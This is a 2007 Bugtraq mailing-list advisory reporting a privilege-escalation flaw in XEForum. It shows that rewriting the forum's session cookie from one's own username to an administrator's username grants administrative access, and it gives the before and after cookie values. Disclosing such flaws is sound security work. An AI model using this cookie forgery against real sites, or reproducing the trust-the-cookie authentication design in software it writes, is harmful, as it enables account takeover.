Bugtraq mailing list archives
XEForum Cookie Modification Privilege Escalation Vulnerability
From: Firewall1954 () hotmail com
Date: 28 Jun 2007 01:12:55 -0000
-------------------------------------------------------------------- XEForum Cookie Modification Privilege Escalation Vulnerability -------------------------------------------------------------------- Vulnerable product: XEForum Vendor: http://www.xeforum.com/ Date: -------------------- Found: Jun 26, 2007 Vulnerability: -------------------- XeForum contains a flaw that may allow a remote attacker to gain administrative privileges. Modifying contained cookie you can change of session and to even enter like administrator. Cookie: ----------------------------------- : Cookie: xeforum="Your Username" : ----------------------------------- change to: ------------------------------------ : Cookie: xeforum="Admin Username" : ------------------------------------ Credit: -------------------- Firewall Firewall of Peru Firewall () hotmail com Greetz to Swp-Scene And Revolutionz http://4firewall.uni.cc --------------------------------------------------------------------
Current thread:
- XEForum Cookie Modification Privilege Escalation Vulnerability Firewall1954 (Jun 28)